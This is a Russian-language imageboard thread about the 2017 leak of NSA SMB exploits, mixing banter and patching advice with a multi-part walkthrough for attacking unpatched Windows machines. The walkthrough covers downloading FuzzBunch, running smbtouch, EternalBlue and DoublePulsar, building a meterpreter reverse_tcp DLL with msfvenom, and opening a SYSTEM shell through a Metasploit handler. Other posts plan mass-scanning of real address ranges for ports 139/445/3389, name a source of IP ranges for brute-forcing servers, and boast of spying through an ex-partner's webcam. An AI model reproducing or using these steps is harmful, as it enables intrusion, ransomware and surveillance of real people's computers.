300 постов дауны трут о том как страшно жить при этом никто даже описание не прочитал.
Походу оп начинающий провинциальный админ судя по стилю постов.
тоже поржал с долбаебов.
300 постов дауны трут о том как страшно жить при этом никто даже описание не прочитал.
Походу оп начинающий провинциальный админ судя по стилю постов.
>>151221056
И?
Там стоит галочка напротив икспи и 2003.
Хуле ты это постишь, я про это и написал. Ты умственно отсталый?
И?
Там стоит галочка напротив икспи и 2003.
Хуле ты это постишь, я про это и написал. Ты умственно отсталый?
Ответы151221197
>>151220931
А зачем тебе жопой в инет?
Тебе хватит троянчика, запущенного секретаршей в твоей конторе. PEEZDARIQUE всему.
Ты не понимаешь момента - конкретные тулзы - да, детектятся, но важен-то способ. Через неделю появятся новые, еше не детектящиеся.
Кроме того, это захватит огромный парк машин, на которых стоит по каким-то причинам необновляемая система. А таких во внутренних сетях предприятий достаточно.
А зачем тебе жопой в инет?
Тебе хватит троянчика, запущенного секретаршей в твоей конторе. PEEZDARIQUE всему.
>Алсо уже все топ антивирусы детектят это говно.
Ты не понимаешь момента - конкретные тулзы - да, детектятся, но важен-то способ. Через неделю появятся новые, еше не детектящиеся.
Кроме того, это захватит огромный парк машин, на которых стоит по каким-то причинам необновляемая система. А таких во внутренних сетях предприятий достаточно.
>>151184817 (OP)
Какой питон нужон для энтого фрейсворка?
Какой питон нужон для энтого фрейсворка?
>>151184817 (OP)
Добра тебе, анон.
Добра тебе, анон.
>>151221104
Нет ты.
Посмотри новости, уже все выяснили, что работает и на других версиях.
>Хуле ты это постишь, я про это и написал. Ты умственно отсталый?
Нет ты.
Посмотри новости, уже все выяснили, что работает и на других версиях.
Ответы151221274
>>151221131
Кончай нести ахинею.
Секретарша и так запустит любое говно.
И так полно сплоитов типа потато которые отлично работают на необновленных системах.
В чем суть твоего мессаджа не ясно. Но видно что тебе очень хочется казаться умным.
Продолжай расказывать как 2008 сервер овнит сплоит для 2003.
Сажа.
Кончай нести ахинею.
Секретарша и так запустит любое говно.
И так полно сплоитов типа потато которые отлично работают на необновленных системах.
В чем суть твоего мессаджа не ясно. Но видно что тебе очень хочется казаться умным.
Продолжай расказывать как 2008 сервер овнит сплоит для 2003.
Сажа.
>>151221197
кек.
Ну лан.
А мы то с мужиками и не знаем.
Ты сам то проверял? Или только репостить всякую хуйню можешь?
кек.
Ну лан.
А мы то с мужиками и не знаем.
Ты сам то проверял? Или только репостить всякую хуйню можешь?
Ответы151221368
>>151184817 (OP)
Кстати зачем ты на github кидаешь, там уже рапакованные и перезалитые.
Стопудов наприклеивали хуйни своей
Кстати зачем ты на github кидаешь, там уже рапакованные и перезалитые.
Стопудов наприклеивали хуйни своей
31 Кб, 400x400
>>151221131
Причем тут тогда опубликованные сплоиты?
>Тебе хватит троянчика, запущенного секретаршей в твоей конторе
Причем тут тогда опубликованные сплоиты?
Ответы151221447
Блять я еблан в скрипте же написано 2.6 ))
>>151221293
просто он вонаби мамкин хакир. Это же круто с умным видом произносить всякие технические термины.
просто он вонаби мамкин хакир. Это же круто с умным видом произносить всякие технические термины.
Ответы151221447
>>151221233
Еще раз. В сети уже полно случаев, когда ломали сервера с единственным открытым рдп портом.
Единственная моя цель - предупредить анона, который еще не в курсе ситуации.
Да мне похрен на тебя. Считаешь себя самым умным - ок, я не против.
>>151221274
Да. Работает. Развернул из бекапа свою ту виртуалку и грохнул ее уже сам. 2008r2, обновления ставил месяц назад, до глобальных патчей.
Больше времени разбираться не было.
Мне без разницы, веришь ты или нет, мое дело предупредить тех, кому это может навредить.
>В чем суть твоего мессаджа не ясно.
Еще раз. В сети уже полно случаев, когда ломали сервера с единственным открытым рдп портом.
Единственная моя цель - предупредить анона, который еще не в курсе ситуации.
>Продолжай расказывать как 2008 сервер овнит сплоит для 2003.
Да мне похрен на тебя. Считаешь себя самым умным - ок, я не против.
>>151221274
Да. Работает. Развернул из бекапа свою ту виртуалку и грохнул ее уже сам. 2008r2, обновления ставил месяц назад, до глобальных патчей.
Больше времени разбираться не было.
Мне без разницы, веришь ты или нет, мое дело предупредить тех, кому это может навредить.
Ответы151221444
Спрошу тут, может ответят..
Собрался ставить шиндвс10, оно мне Биос не испортит?
Слухи вроде нехорошие ходят Чет я очкую
Собрался ставить шиндвс10, оно мне Биос не испортит?
Слухи вроде нехорошие ходят Чет я очкую
Ответы151221570
Нахуя это? Обычных пользователей стационарного пека не затронет же.
>>151221368
Спасибо анон, ты очень добрый хакер, боженька тебя за это вознаградит, на небе
А на самом деле ненужно кричать о таких вещах, я щитаю.
Нужно дать рибитишкам вдоволь порезвится
Спасибо анон, ты очень добрый хакер, боженька тебя за это вознаградит, на небе
А на самом деле ненужно кричать о таких вещах, я щитаю.
Нужно дать рибитишкам вдоволь порезвится
>>151221293
Подразумеваю, что у тебя уже есть скачанные год назад архивы.
Если что - ссылки все есть в статьях, все в открытом доступе, бери да проверяй сам.
>>151221339
Ок, почитай, что с умным видом произносят буржуи, если тебя как-то задевают мои посты.
>>151221321
Притом.
https://www.youtube.com/watch?v=n_MmgtzUUAw
Подразумеваю, что у тебя уже есть скачанные год назад архивы.
Если что - ссылки все есть в статьях, все в открытом доступе, бери да проверяй сам.
>>151221339
Ок, почитай, что с умным видом произносят буржуи, если тебя как-то задевают мои посты.
>>151221321
Притом.
https://www.youtube.com/watch?v=n_MmgtzUUAw
274 Кб, 1920x1055
>>151220931
У меня в мухосранске один единственный(номинально есть ещё 1, но на нём 0.01% сидят) провайдер. Он ВСЕМ клиентам предоставляет белый, хоть и динамический(после реконнекта PPPoE) IP. Да, дома у многих стоят wi-fi роутеры, но не у всех же. Просканил сейчас 255 адресов провайдера - 4 самба порта торчит наружу. А сколько всего у провайдера клиентов, как думаешь?
Кто теперь лалка?
>>151220888
Нет ты.
Ну ты и балбес.
>и много ты самбы жопой в инет видел лалка?
У меня в мухосранске один единственный(номинально есть ещё 1, но на нём 0.01% сидят) провайдер. Он ВСЕМ клиентам предоставляет белый, хоть и динамический(после реконнекта PPPoE) IP. Да, дома у многих стоят wi-fi роутеры, но не у всех же. Просканил сейчас 255 адресов провайдера - 4 самба порта торчит наружу. А сколько всего у провайдера клиентов, как думаешь?
Кто теперь лалка?
>>151220888
>Иди нахуй шиндоусебан
Нет ты.
>Уже 4 года не ставил не одной обновы на свою 7.
Ну ты и балбес.
Ответы151221502
Ответы151221497
>>151221479
Я отвечал на пост другого анона, про секретаршу и внутреннюю сеть предприятия или конторы например.
Сервак с файловой шарой, ага?
Я отвечал на пост другого анона, про секретаршу и внутреннюю сеть предприятия или конторы например.
Сервак с файловой шарой, ага?
>>151221462
походу ты совсем в деревне живешь. Даже в пгт у моей бабки поголовно у всех тплинки стоят.
походу ты совсем в деревне живешь. Даже в пгт у моей бабки поголовно у всех тплинки стоят.
Ответы151221519
>>151221502
Это те, которые с бекдором в прошивке?
Это те, которые с бекдором в прошивке?
>>151221519
это те с паролем админ
пиздец я с вас в голос ржу. Типа открыли америку интернет в опасности. ЖЖ артемия лебедева уже нашли?
это те с паролем админ
пиздец я с вас в голос ржу. Типа открыли америку интернет в опасности. ЖЖ артемия лебедева уже нашли?
Ответы151221559
>>151221519
Кстати да, не стоит списывать со счетов уязвимости в древних тплинках+дефолтные или очень простые пароли+возможно включенный wps. Всякие хакиры довольно быстро напишут бота, который всё это автоматом будет чекать и попадая в роутер пробрасывать самба порт наружу.
Кстати да, не стоит списывать со счетов уязвимости в древних тплинках+дефолтные или очень простые пароли+возможно включенный wps. Всякие хакиры довольно быстро напишут бота, который всё это автоматом будет чекать и попадая в роутер пробрасывать самба порт наружу.
Ответы151221596
>>151221447
Стим не умеет брутить, значить в топку
Стим не умеет брутить, значить в топку
>>151221570
пропишут в биос смб порт тебе а потом тебе подросят криптолокера.
пропишут в биос смб порт тебе а потом тебе подросят криптолокера.
Ответы151221632
Поясните пожалуйста, что делать коммон юзеру, который ни слова не понял из ОП поста. Серверов не имеющий, ничего важного не хранящего.
>>151221706
Пользоваться windows update.
Пользоваться windows update.
>>151221706
нужно в биосе закрыть сб и рдп порт.
нужно в биосе закрыть сб и рдп порт.
Ответы151221784
>>151221752
Анус себе в биосе закрой, толстота.
Анус себе в биосе закрой, толстота.
>>151221233
А где сажа, тупень?
А где сажа, тупень?
Мам, я какир)) Ну мааам
>>151184817 (OP)
Я рядовой юзер винды, чем мне будет угрожать вышеописанная ХУNТА?
Что со мной могут сделать "хакнув"?
Я рядовой юзер винды, чем мне будет угрожать вышеописанная ХУNТА?
Что со мной могут сделать "хакнув"?
>>151221913
шифранут твои файлы
шифранут твои файлы
>>151221913
Если хакнут - всё, что угодно. Хоть файлы удалять, хоть вёбкамерой подсматривать как ты письку трёшь. Но более вероятный вариант, что весь твой винт зашифруют и предложат заплатить денег за расшифровку.
ДЛЯ ТЕХ КТО НЕ ПОНЯЛ - ПРОСТО ОБНОВИТЕ СВОЙ ШИНДОУС И НЕ ПАРЬТЕСЬ
Если хакнут - всё, что угодно. Хоть файлы удалять, хоть вёбкамерой подсматривать как ты письку трёшь. Но более вероятный вариант, что весь твой винт зашифруют и предложат заплатить денег за расшифровку.
ДЛЯ ТЕХ КТО НЕ ПОНЯЛ - ПРОСТО ОБНОВИТЕ СВОЙ ШИНДОУС И НЕ ПАРЬТЕСЬ
Ответы151222126
>>151221963
Я все понял, порекомендуй каких нибудь криптолокеров годных
Я все понял, порекомендуй каких нибудь криптолокеров годных
bump
690 Кб, 1916x976
Вот как-то так оно выглядит. Ман по установке/настройке накидать?
>>151223809
Давай, тоже потестить хочу. Сперва расскажи, как джве виндовых виртуалки между собой в сеть законнектить для тестов?
Давай, тоже потестить хочу. Сперва расскажи, как джве виндовых виртуалки между собой в сеть законнектить для тестов?
>>151223867
Часть 1.
На атакующую виртуалку накатываешь XP/7 x86 (именно x86, не 64). Ставишь питухон 2.6.6 (https://www.python.org/ftp/python/2.6.6/python-2.6.6.msi) и pywin32 (https://sourceforge.net/projects/pywin32/files/pywin32/Build 219/pywin32-219.win32-py2.6.exe/download), опционально - ConEmu. После установки качай архив с гитхаба (https://github.com/DonnchaC/shadowbrokers-exploits/archive/master.zip), распаковывай папку windows куда-нибудь (c:\nsa\, например)
Часть 1.
На атакующую виртуалку накатываешь XP/7 x86 (именно x86, не 64). Ставишь питухон 2.6.6 (https://www.python.org/ftp/python/2.6.6/python-2.6.6.msi) и pywin32 (https://sourceforge.net/projects/pywin32/files/pywin32/Build 219/pywin32-219.win32-py2.6.exe/download), опционально - ConEmu. После установки качай архив с гитхаба (https://github.com/DonnchaC/shadowbrokers-exploits/archive/master.zip), распаковывай папку windows куда-нибудь (c:\nsa\, например)
>>151224042
А потом ты её тащишь в сеть и её анально насилуют.
>На атакующую виртуалку накатываешь XP/7 x86 (именно x86, не 64).
А потом ты её тащишь в сеть и её анально насилуют.
БЛЯЯЯЯ, ну сука. Придётся заняться теперь диким пердолингом. У меня к серваку был рдп настроен свой порт. В роутере был дмз настроен. Ну бля теперь всё перенастраивать придётся. Или может забью ибо всё равно хотел железо менять
>>151224077
Да вот не похуй - пусть насилуют в виртуалке.
Да вот не похуй - пусть насилуют в виртуалке.
>>151224077
Не обязательно тащить её в сеть. Я между двумя виртуалками тестил, брат жив.
Не обязательно тащить её в сеть. Я между двумя виртуалками тестил, брат жив.
>>151224042
Ты долго здесь будешь? Накатываю win7x64 в качестве атакуемой, после еще поставить x86 - минут 30 уйдет на всё это.
Ты долго здесь будешь? Накатываю win7x64 в качестве атакуемой, после еще поставить x86 - минут 30 уйдет на всё это.
Ответы151224321
>>151223867
>>151224042
Часть 2.
Создаешь в корне диска C: папку logs. Открываешь консоль, переходишь в папку с fb.py (c:\nsa\), запускаешь: python fb.py и смотришь, какую ошибку напишет (а напишет он, что не найдена папка бла-бла-бла). Из текста ошибки дёргаешь название папки, создаёшь её в c:\nsa\. Всё, you are ready to rock.
>>151224042
Часть 2.
Создаешь в корне диска C: папку logs. Открываешь консоль, переходишь в папку с fb.py (c:\nsa\), запускаешь: python fb.py и смотришь, какую ошибку напишет (а напишет он, что не найдена папка бла-бла-бла). Из текста ошибки дёргаешь название папки, создаёшь её в c:\nsa\. Всё, you are ready to rock.
Ответы151224342
>>151224191
Еще с полчаса-час точно буду. Единственный момент - писать буду по памяти, потому что тестовых виртуалок сейчас нет под рукой.
Еще с полчаса-час точно буду. Единственный момент - писать буду по памяти, потому что тестовых виртуалок сейчас нет под рукой.
Ответы151224644
>>151224320
Взлом уровня N S A
Взлом уровня N S A
>>151224289
Часть 3, самое интересное.
Создаешь новый проджект в fuzzbunch. Забиваешь IP'шники (первый - жертва, второй - твой), Use redirection - n (или no, хуй проссышь как оно вообще работает). Запускаешь smbtouch (use smbtouch), оно будет спрашивать всякое, просто соглашайся (в тепличных условиях нормально работает, на "живых" машинах могут возникнуть небольшие затруднения). Ждёшь пока отработает и смотришь, каким сплоитом можно пробить тачку (для 7 32/64 и 2k8 обычно eternalblue).
Часть 3, самое интересное.
Создаешь новый проджект в fuzzbunch. Забиваешь IP'шники (первый - жертва, второй - твой), Use redirection - n (или no, хуй проссышь как оно вообще работает). Запускаешь smbtouch (use smbtouch), оно будет спрашивать всякое, просто соглашайся (в тепличных условиях нормально работает, на "живых" машинах могут возникнуть небольшие затруднения). Ждёшь пока отработает и смотришь, каким сплоитом можно пробить тачку (для 7 32/64 и 2k8 обычно eternalblue).
А если RDP открыт только внутри сети?
>>151224496
Часть 3, продолжение.
Если советует юзать eternalblue - юзай его, если советует eternalromance или eternalchampion - юзай eternalromance (проще в настройке). Прописываешь use eternalblue, опять начнутся вопросы, обрати внимание на тип payload'а (FB/DANE) - нам нужен FB, сервис (SMB, 445) и архитектуру атакуемой системы (smbtouch вроде пишет при сканировании). Заполняешь, спросит про плагины - y, ждёшь. Если будет написано =======WIN=======, то значит на атакуемой машине заработал doublepulsar (NSA'шный бэкдор).
Часть 3, продолжение.
Если советует юзать eternalblue - юзай его, если советует eternalromance или eternalchampion - юзай eternalromance (проще в настройке). Прописываешь use eternalblue, опять начнутся вопросы, обрати внимание на тип payload'а (FB/DANE) - нам нужен FB, сервис (SMB, 445) и архитектуру атакуемой системы (smbtouch вроде пишет при сканировании). Заполняешь, спросит про плагины - y, ждёшь. Если будет написано =======WIN=======, то значит на атакуемой машине заработал doublepulsar (NSA'шный бэкдор).
Ответы151224935
>>151224496
Вангую в вебаче сегодня-же появятся треды по масс-чекингу, аля берем диапазоны отсюда, чекаем массканом 139, 445 и ебошим этерналблюем
Вангую в вебаче сегодня-же появятся треды по масс-чекингу, аля берем диапазоны отсюда, чекаем массканом 139, 445 и ебошим этерналблюем
Ответы151224640
>>151224625
Да я уже сам думаю масс-сканилку с гуём накидать, лол
Да я уже сам думаю масс-сканилку с гуём накидать, лол
>>151224321
Ставлю вторую (x86). Распиши пока как и в виртуалбоксе в одну сетку загнать?
Ставлю вторую (x86). Распиши пока как и в виртуалбоксе в одну сетку загнать?
Ответы151224746
34 Кб, 731x437
>>151224644
В обоих виртуалках в настройках адаптера выстави тип подключения - "Внутренняя сеть" и какое-нибудь одинаковое имя. После установки систем назначь IP'шники машинам (10.0.0.1/255.255.255.0 на первой и 10.0.0.2/шлюз 10.0.0.1/255.255.255.0 на второй)
В обоих виртуалках в настройках адаптера выстави тип подключения - "Внутренняя сеть" и какое-нибудь одинаковое имя. После установки систем назначь IP'шники машинам (10.0.0.1/255.255.255.0 на первой и 10.0.0.2/шлюз 10.0.0.1/255.255.255.0 на второй)
Ответы151226233
>>151221706
Фаервол установи. Хакиры пососут.
Фаервол установи. Хакиры пососут.
>>151224621
Часть 4.
Так, теперь самое главное. Нужна тачка с metasploit framework. Версия не суть важна, но лучше, конечно, что-нибудь относительно свежее. Для начала соберём DLL, которую будем скармливать DoublePulsar'у. Если атакуемая тачка на x32(x86), то пишем: msfvenom -p windows/meterpreter/reverse_tcp LHOST="IP хоста с metasploit (без кавычек)" LPORT=1338 -f dll > meter32.dll. В рабочей директории появится meter32.dll, перекидываем её в C:\nsa на атакующем хосте. Поднимаем хэндлер, для этого:
1) Запускаем сам MSF - msfconsole
2) После запуска - use multi/handler
3) set payload windows/meterpreter/reverse_tcp
4) set lhost 0.0.0.0
5) set lport 1338
6) exploit -j
После этого хэндлер запустится в фоновом режиме (посмотреть, работает ли он, можно с помощью команды jobs в консоли metasploit)
Часть 4.
Так, теперь самое главное. Нужна тачка с metasploit framework. Версия не суть важна, но лучше, конечно, что-нибудь относительно свежее. Для начала соберём DLL, которую будем скармливать DoublePulsar'у. Если атакуемая тачка на x32(x86), то пишем: msfvenom -p windows/meterpreter/reverse_tcp LHOST="IP хоста с metasploit (без кавычек)" LPORT=1338 -f dll > meter32.dll. В рабочей директории появится meter32.dll, перекидываем её в C:\nsa на атакующем хосте. Поднимаем хэндлер, для этого:
1) Запускаем сам MSF - msfconsole
2) После запуска - use multi/handler
3) set payload windows/meterpreter/reverse_tcp
4) set lhost 0.0.0.0
5) set lport 1338
6) exploit -j
После этого хэндлер запустится в фоновом режиме (посмотреть, работает ли он, можно с помощью команды jobs в консоли metasploit)
>>151224935
Метасплоит хер зарегаешь - ещё и кали накатывать виртуалкой или может есть где-то под винду уже спёртый?
Метасплоит хер зарегаешь - ещё и кали накатывать виртуалкой или может есть где-то под винду уже спёртый?
Ответы151225090
ЭКСПОЛОЙТЫ БОЛЕЕ НЕ ПРЕДСТАВЛЯЮТ ОПАСНОСТИ И НЕ ПРЕДСТАВЛЯЛИ ПОСЛЕ 2013 ГОДА, ШКОЛОТА КАК ОБЫЧНО ПУКНУЛА СЕБЕ В ЛИЦО
-Крыса-кун
-Крыса-кун
Ответы151225089
>>151225051
Я такой капсболд каждые пол года читаю начиная с 2001 года.
Я такой капсболд каждые пол года читаю начиная с 2001 года.
>>151224935
Часть 5, почти финал.
В консоли fuzzbunch пишем use doublepulsar, снова начнутся вопросы. Архитектура - такая же, как и на атакуемой машине, дальше спросит про Function - выбираем номер с RunDLL. Спросит про путь до DLL - вводим путь до собранной DLL с meterpreter'ом (c:\nsa\meter32.dll). Прожимаем энтер на всё остальное и ждём. Если всё нормально, то в консоли metasploit появится инфа по отправке стэйджа meterpreter, после чего откроется новая сессия.
>>151224992
Под винду спёртого вроде нет, проще кали накатить.
Часть 5, почти финал.
В консоли fuzzbunch пишем use doublepulsar, снова начнутся вопросы. Архитектура - такая же, как и на атакуемой машине, дальше спросит про Function - выбираем номер с RunDLL. Спросит про путь до DLL - вводим путь до собранной DLL с meterpreter'ом (c:\nsa\meter32.dll). Прожимаем энтер на всё остальное и ждём. Если всё нормально, то в консоли metasploit появится инфа по отправке стэйджа meterpreter, после чего откроется новая сессия.
>>151224992
Под винду спёртого вроде нет, проще кали накатить.
Ответы151225119
>>151184817 (OP)
Аноны, где брать новые диапазоны для брута дедиков?
Аноны, где брать новые диапазоны для брута дедиков?
>>151225090
А, и да, когда будет спрашивать про Ordinal, вместо 1 нужно выставить 5
А, и да, когда будет спрашивать про Ordinal, вместо 1 нужно выставить 5
Ответы151225205
>>151219069
Меня всегда удивляло это хохло-слово...
Меня всегда удивляло это хохло-слово...
>>151225119
Часть 6. NoFun
Прибиваем doublepulsar (use doublepulsar, дальше всё как в 5 части за исключением функции - выбираем Uninstall) и радуемся meterpreter'у с правами NT Authority\SYSTEM. Что делать дальше - уже на своё усмотрение.
Часть 6. NoFun
Прибиваем doublepulsar (use doublepulsar, дальше всё как в 5 части за исключением функции - выбираем Uninstall) и радуемся meterpreter'у с правами NT Authority\SYSTEM. Что делать дальше - уже на своё усмотрение.
>>151225100
На дваче, очевидно же.
На дваче, очевидно же.
Ответы151225271
>>151224935
Спасибо тебе аноньчик, все развернуто и понятно.
Я так понял отработает doublepulsar и зальет нашу dll'ку затем откроется сессия в метерпретер, собственно обязательно дллку или можно exe заливать?
Спасибо тебе аноньчик, все развернуто и понятно.
Я так понял отработает doublepulsar и зальет нашу dll'ку затем откроется сессия в метерпретер, собственно обязательно дллку или можно exe заливать?
Ответы151225300
>>151225209
Я серьезно.
Я серьезно.
>>151225100
bgp.he.net
>>151225217
DLL онли, Raw Shellcode роняет систему. Если сессия не появится, а doublepulsar будет писать, что бэкдор отработал - попробуй заново запустить doublepulsar (смотри ч.5)
bgp.he.net
>>151225217
DLL онли, Raw Shellcode роняет систему. Если сессия не появится, а doublepulsar будет писать, что бэкдор отработал - попробуй заново запустить doublepulsar (смотри ч.5)
Спасает ли виндозовский фаервол с ограничением доступа по ип к рдп порту?
Ответы151225513
>>151225300
Ясненько, слава богу что ты есть, на днях еще такой в твитере сижу репостчю этого хакерфантастик, думаю будет настроение над попробовать, а тут и ты подоспел с гайдом.
Сам вряд-ли бы разобрался, вначале думал там в самом fb.py сессия открывается
Ясненько, слава богу что ты есть, на днях еще такой в твитере сижу репостчю этого хакерфантастик, думаю будет настроение над попробовать, а тут и ты подоспел с гайдом.
Сам вряд-ли бы разобрался, вначале думал там в самом fb.py сессия открывается
>>151225447
Если SMB/NBT не заблочены, то нет
>>151225458
А сессия и в fb.py открывается (можешь глянуть - пропиши session после того как eternalblue отработает)
Если SMB/NBT не заблочены, то нет
>>151225458
А сессия и в fb.py открывается (можешь глянуть - пропиши session после того как eternalblue отработает)
>>151225300
Спасибо.
Спасибо.
>>151225458
Вообще, это вин уровня MS08-067, а может даже выше, но я не планирую масс-сканом заниматься (во всяком случае не сейчас)
Вообще, это вин уровня MS08-067, а может даже выше, но я не планирую масс-сканом заниматься (во всяком случае не сейчас)
Ответы151225675
>>151224935
Алсо, быстрофикс вот сюда. Если же атакуемая ось x64, то после windows добавляется /x64/ (и в msfvenom, и в multi/handler). Т.е. должно получиться так: windows/x64/meterpreter/reverse_tcp
Алсо, быстрофикс вот сюда. Если же атакуемая ось x64, то после windows добавляется /x64/ (и в msfvenom, и в multi/handler). Т.е. должно получиться так: windows/x64/meterpreter/reverse_tcp
>>151225592
Кстати можно до сих пор находить такие, встречаются под MS08-067 их мало, но есть.
Еще небольшая заметочка может кому тоже пригодится: masscan в 139, 445 не умеет, не знаю почему но конкретно их точно не ищет, их можно искать тупо сканируя 3389, т.к на дедиках они как правило в пачке присутствуют, а затем уже по этому списку пройтись nmap'ом если нужен именно 445.
Кстати можно до сих пор находить такие, встречаются под MS08-067 их мало, но есть.
Еще небольшая заметочка может кому тоже пригодится: masscan в 139, 445 не умеет, не знаю почему но конкретно их точно не ищет, их можно искать тупо сканируя 3389, т.к на дедиках они как правило в пачке присутствуют, а затем уже по этому списку пройтись nmap'ом если нужен именно 445.
Ответы151225749
Взломал комп бывшей. Теперь смогу наконец смотреть её вебкамеру lkdsgnafaba'vbak'ergjaer[gwjeriglkfdvnkjlds vsdf.sd sg, sg sgbsrgtrtbrtbrtbrtrtttttttttttttttttttttttttttttttttttttt
>>151225675
Так можно и своими силами сканить. Обновившихся, на вскидку, процентов 15-20. Можно просто ломать всё (почти всё), что торчит наружу 137/139/445 портом.
Так можно и своими силами сканить. Обновившихся, на вскидку, процентов 15-20. Можно просто ломать всё (почти всё), что торчит наружу 137/139/445 портом.
>>151225773
проф версия
проф версия
>>151225773
Не тестил 8/8.1. Апдейт MS17-010 вышел 14 марта, если обновлялся недавно, то очевидно что нет.
Не тестил 8/8.1. Апдейт MS17-010 вышел 14 марта, если обновлялся недавно, то очевидно что нет.
Да кто блядь включает этот сраный рдп, да еще и порты пробрасывает через роутеры наружу? есть такие ебонутые? слышал только, что дебики так 1С юзают, ну что взять с говноедов.
>>151225915
Поверь, таких дебиков предостаточно, и не только в роиссе. Более того, они еще и автоапдейты вырубают.
Поверь, таких дебиков предостаточно, и не только в роиссе. Более того, они еще и автоапдейты вырубают.
Ответы151226054
>>151225957
Учитывая как это говно работает в винде, ничего удивительного.
>еще и автоапдейты вырубают
Учитывая как это говно работает в винде, ничего удивительного.
Ответы151226247
>>151225915
Щито поделать, когда другие дебики не выделяют денег на сервер виртуализации\1с сурв, а сами гоняют на майбахах
>слышал только, что дебики так 1С юзают, ну что взять с говноедов
Щито поделать, когда другие дебики не выделяют денег на сервер виртуализации\1с сурв, а сами гоняют на майбахах
Ответы151226110
>>151225915
а как выключить рдп?
а как выключить рдп?
Ответы151226110
>>151225915
Большинство думает шаблоном "НУ ВЕДЬ У МЕНЯ ФАИРВОЛ И АНТИВИРУС. А ЕЩЁ ПОЛИТИКИ. ХАКИРЫ САСАЙТИ!"
Большинство думает шаблоном "НУ ВЕДЬ У МЕНЯ ФАИРВОЛ И АНТИВИРУС. А ЕЩЁ ПОЛИТИКИ. ХАКИРЫ САСАЙТИ!"
Такс, свои ответы можете задать здесь: зерочан/i/5324, вечером буду.
>>151223809-кун
>>151223809-кун
>>151226202
Почему не двощ? Потому что макак-пидор снёс /i/ года 3 назад (если не больше)
Почему не двощ? Потому что макак-пидор снёс /i/ года 3 назад (если не больше)
>>151226202
Обнял, на созвоне :3
Обнял, на созвоне :3
Ответы151226399
>>151226054
Как работает? Ставится в фоне, инсталится при выключении, ещё и спрашивает как хочешь поставить и хочешь ли ты ставить обновления качая с мобильного инета. Если ты не деб который на Семёрке в 2к17 году конечно же.
Как работает? Ставится в фоне, инсталится при выключении, ещё и спрашивает как хочешь поставить и хочешь ли ты ставить обновления качая с мобильного инета. Если ты не деб который на Семёрке в 2к17 году конечно же.
Ответы151226570
>>151226233
А, блядь, просто Брэндмауэр шиндоус пинг по дефолту фильтрует. Всё норм.
А, блядь, просто Брэндмауэр шиндоус пинг по дефолту фильтрует. Всё норм.
Ответы151226276
О, ебать. Черношляпники подъехали.
ВСТУПАЙТЕ И КОМПИЛИРУЙТЕ
ВСТУПАЙТЕ И КОМПИЛИРУЙТЕ
>>151226246
Будь няшей, напиши там в треде что-нибудь NULLчан.hk, господи, я хуй знает как еще написать
Будь няшей, напиши там в треде что-нибудь NULLчан.hk, господи, я хуй знает как еще написать
Ответы151226605
>>151184817 (OP)
Помню какой-то хацкер пробрался в мой ровутер через DynDNS, переименовал точку доступа в PWNEDBy2ch и пароль в SmeniParol.
Это я потом понял что у меня DynDNS и пароль стандартный был, но когда я обнаружил ВТОРЖЕНИЕ я знатно очканул.
Помню какой-то хацкер пробрался в мой ровутер через DynDNS, переименовал точку доступа в PWNEDBy2ch и пароль в SmeniParol.
Это я потом понял что у меня DynDNS и пароль стандартный был, но когда я обнаружил ВТОРЖЕНИЕ я знатно очканул.
>>151226247
Работает как говно, апдейты по часу накатывает, будто блядь там вся винда переустанавливается, хранит гигабайты говна после апденйтов.
Работает как говно, апдейты по часу накатывает, будто блядь там вся винда переустанавливается, хранит гигабайты говна после апденйтов.
>>151184817 (OP)
Спасибо няш
Спасибо няш
>>151226570
Чо за хуйню поришь? Если на пустую то да, первое обновление долгое, а потом все быстро, пара минут.
Чо за хуйню поришь? Если на пустую то да, первое обновление долгое, а потом все быстро, пара минут.
473 Кб, 1135x989
Лол, действительно работает. Вечером виртуалочку с кали накачу, для завершения проверки.
Ответы151226956
>>151226880
Совет - накати ConEmu, не мучайся с консолью
Совет - накати ConEmu, не мучайся с консолью
>>151226570
Подозреваю, что ты про голую win7 SP1? Давно уже есть решение(пишу для x64):
1)Голая семерка, вырубаешь СРАЗУ проверку обновлений до втыкания кабеля.
2)Вставляешь кабель, качаешь KB3172605-x64 и KB3020369-x64. Ставишь.
3)Качаешь kb3125574 (это по сути SP2 для семерки), ставишь.
4)Врубаешь обновления и докачиваешь без гемора последние апдейты.
Ссылка по теме:
https://habrahabr.ru/company/eset/blog/301080/
Подозреваю, что ты про голую win7 SP1? Давно уже есть решение(пишу для x64):
1)Голая семерка, вырубаешь СРАЗУ проверку обновлений до втыкания кабеля.
2)Вставляешь кабель, качаешь KB3172605-x64 и KB3020369-x64. Ставишь.
3)Качаешь kb3125574 (это по сути SP2 для семерки), ставишь.
4)Врубаешь обновления и докачиваешь без гемора последние апдейты.
Ссылка по теме:
https://habrahabr.ru/company/eset/blog/301080/
Ответы151227335
>>151227233
Ну и дрочево
Ну и дрочево
Ответы151227416
>>151227335
Это один раз сделать и потом спокойно можно оставишь автоматические апдейты. Я столько раз семерку ставил и прекрасно знаю, что если просто win7 сп1 попросить обновиться вин-апдейтом - 2 часа поиска обновлений, 2 часа установки, все апдейты с первого раза скорее всего не встанут -> после ребута снова 2 часа поиска и еще час установка. Так что это "дрочево" самый лучший вариант накатывания семерки.
Это один раз сделать и потом спокойно можно оставишь автоматические апдейты. Я столько раз семерку ставил и прекрасно знаю, что если просто win7 сп1 попросить обновиться вин-апдейтом - 2 часа поиска обновлений, 2 часа установки, все апдейты с первого раза скорее всего не встанут -> после ребута снова 2 часа поиска и еще час установка. Так что это "дрочево" самый лучший вариант накатывания семерки.
Ответы151227605
>>151227580
Сидишь за роутером и обновляешь винду? Тогда нет.
Сидишь за роутером и обновляешь винду? Тогда нет.
>>151184817 (OP)
как это всё юзать?
как это всё юзать?
>>151227637
Тред почитай. Тут уже целый гайд написали.
Тред почитай. Тут уже целый гайд написали.
>>151227605
Сижу за роутером, не обновляю (стоит восьмерка). Мне пизда?
под обновление я ведь правильно понял обновление до более новой винды? (Да, я тупой)
Сижу за роутером, не обновляю (стоит восьмерка). Мне пизда?
под обновление я ведь правильно понял обновление до более новой винды? (Да, я тупой)
>>151184817 (OP)
Тред не читал.
Ебанаты, не умеющие менять номера дефолтных портов, а также ограничивать доступ на маршрутизаторе извне, должны страдать.
> или закрывать порт
> или закрывать порт.
Тред не читал.
Ебанаты, не умеющие менять номера дефолтных портов, а также ограничивать доступ на маршрутизаторе извне, должны страдать.
Ответы151227858
>>151227605
А разве еще и рдп включен по дефолту? челиков с включенным рдп еще нужно попробовать найти.
А разве еще и рдп включен по дефолту? челиков с включенным рдп еще нужно попробовать найти.
>>151227714
